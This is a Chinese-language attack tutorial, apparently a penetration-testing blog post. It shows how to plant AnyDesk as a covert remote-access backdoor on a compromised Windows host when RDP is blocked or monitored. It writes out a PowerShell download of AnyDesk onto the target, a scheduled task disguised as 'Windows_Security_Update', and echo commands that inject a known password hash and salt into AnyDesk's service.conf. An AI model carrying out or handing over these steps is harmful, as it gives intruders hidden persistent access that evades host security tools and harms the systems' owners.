前言
AnyDesk是类似teamviewer的远程桌面管理软件,但是它不用安装,而且体积比较小只有3.7MB
使用场景举例
1.有云锁,护卫神等禁止3389登录时
2.类似阿里云这种,登录3389会报警
3.连接内网中可以出网的windows机器
注意事项
1.启动AnyDesk的权限需要桌面用户权限,比如,IIS做中间件的环境中,拿到了webshell一般般都是没有桌面用户权限的,如果启动AnyDesk不会成功
2.启动AnyDesk时桌面不能被注销
3.有可能连接上去是黑屏,这个是因为该桌面用户退出远程桌面但没有注销,此时,除非能用winlogon启动AnyDesk,否则没法使用屏幕
使用
假设你已经拿到了对方的shell,并且是高权限
下载anydesk
命令行下,下载到对方c:\anydesk.exe,不推荐,实测,下载速度非常慢。建议下载到本地,使用shell自带的上传功能。
powershell (new-object System.Net.WebClient).DownloadFile('https://download.anydesk.com/AnyDesk.exe?_ga=2.215504087.1111133079.1614086491-1698509199.1614086491','C:\anydesk.exe')
查询在线用户
使用quser,可确定有当前哪些用户正在使用桌面
创建计划任务
启动的用户为上个步骤查询出的用户
schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\AnyDesk.exe" /RU lion
执行计划任务
先执行一次计划任务,生成配置文件
schtasks /run /tn Windows_Security_Update
添加密码
然后等待几秒,等AnyDesk成功连接到网络,再把AnyDesk进程杀掉,dir看用户下面是否生成配置文件
cd C:\Users\用户名\AppData\Roaming\AnyDesk
dir /a
然后往service.conf里面添加密码为AnyDeskGetAccess
echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> service.conf
查看anydeskID
type system.conf
连接anydesk
schtasks /run /tn Windows_Security_Update 输入刚才的id
连接密码为AnyDeskGetAccess,即可连接成功